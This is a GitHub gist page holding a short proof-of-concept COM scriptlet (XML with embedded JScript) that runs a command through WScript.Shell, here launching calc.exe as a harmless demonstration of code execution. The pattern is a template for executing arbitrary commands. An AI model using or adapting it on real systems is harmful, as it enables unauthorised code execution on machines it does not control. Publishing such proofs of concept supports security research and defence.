Skip to content

Instantly share code, notes, and snippets.

@gabemarshall
Last active September 9, 2021 02:20
Show Gist options
  • Save gabemarshall/50fbd33fac60a8a13ef8c8f44dca7247 to your computer and use it in GitHub Desktop.
Save gabemarshall/50fbd33fac60a8a13ef8c8f44dca7247 to your computer and use it in GitHub Desktop.
<?XML version="1.0"?>
<scriptlet>
<registration
progid="PoC"
classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
<script language="JScript">
<![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
]]>
</script>
</registration>
</scriptlet>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment